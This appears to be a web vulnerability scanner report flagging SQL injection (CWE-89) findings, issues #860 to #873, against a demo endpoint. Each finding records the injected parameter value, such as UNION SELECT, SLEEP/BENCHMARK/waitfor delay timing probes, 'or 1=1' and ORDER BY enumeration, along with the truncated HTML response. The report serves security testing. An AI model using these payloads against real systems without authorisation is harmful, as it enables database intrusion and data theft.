\nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #860\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #861\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #862\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #863\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #864\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #865\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #866Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #867\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #868\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ');waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #869\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'LIKE'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #870\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #871\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #872\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #873\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 